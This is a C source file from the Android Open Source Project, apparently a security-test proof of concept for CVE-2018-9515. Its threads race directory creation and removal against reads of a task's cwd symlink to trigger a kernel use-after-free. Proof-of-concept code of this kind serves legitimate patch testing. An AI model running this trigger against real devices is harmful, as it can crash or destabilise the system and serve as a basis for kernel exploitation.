1 /*
2  * Copyright (C) 2019 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #define _GNU_SOURCE
18 #include <pthread.h>
19 #include <err.h>
20 #include <stdio.h>
21 #include <unistd.h>
22 #include <string.h>
23 #include <time.h>
24 #include <sys/types.h>
25 #include <sys/stat.h>
26 #include <sys/syscall.h>
27 #include "../includes/common.h"
28 
29 pid_t looper_pid;
30 
uaf_worker(void * unused)31 void *uaf_worker(__attribute__ ((unused)) void *unused) {
32   char cwd_path[100];
33   sprintf(cwd_path, "/proc/self/task/%d/cwd", (int)looper_pid);
34 
35   time_t timer = start_timer();
36   while (timer_active(timer)) {
37     char symlink_target[1000];
38     int len = readlink(cwd_path, symlink_target, sizeof(symlink_target)-1);
39     if (len > 0) {
40       symlink_target[len] = 0;
41     }
42   }
43 
44   return NULL;
45 }
46 
chaos_worker(void * unused)47 void *chaos_worker(__attribute__ ((unused)) void *unused) {
48   if (chdir("/sdcard/Android/data/CVE-2018-9515"))
49       err(1, "chdir");
50   rmdir("subdir");
51 
52   time_t timer = start_timer();
53   while (timer_active(timer)) {
54     if (mkdir("subdir", 0777))
55       err(1, "mkdir");
56     if (chdir("subdir"))
57       err(1, "chdir");
58     if (rmdir("../subdir"))
59       err(1, "rmdir");
60     if (chdir(".."))
61       err(1, "chdir");
62   }
63 
64   return NULL;
65 }
66 
main(void)67 int main(void) {
68   looper_pid = syscall(__NR_gettid);
69 
70   pthread_t thread;
71   if (pthread_create(&thread, NULL, uaf_worker, NULL))
72     errx(1, "pthread_create failed");
73 
74   pthread_t thread2;
75   if (pthread_create(&thread2, NULL, chaos_worker, NULL))
76     errx(1, "pthread_create failed");
77 
78   char my_dir_name[100];
79   sprintf(my_dir_name, "/sdcard/Android/data/CVE-2018-9515/foobar");
80   rmdir(my_dir_name);
81 
82   time_t timer = start_timer();
83   while (timer_active(timer)) {
84     if (mkdir(my_dir_name, 0777))
85       err(1, "looper: mkdir");
86     if (rmdir(my_dir_name))
87       err(1, "looper: rmdir");
88   }
89 
90   return 0;
91 }
92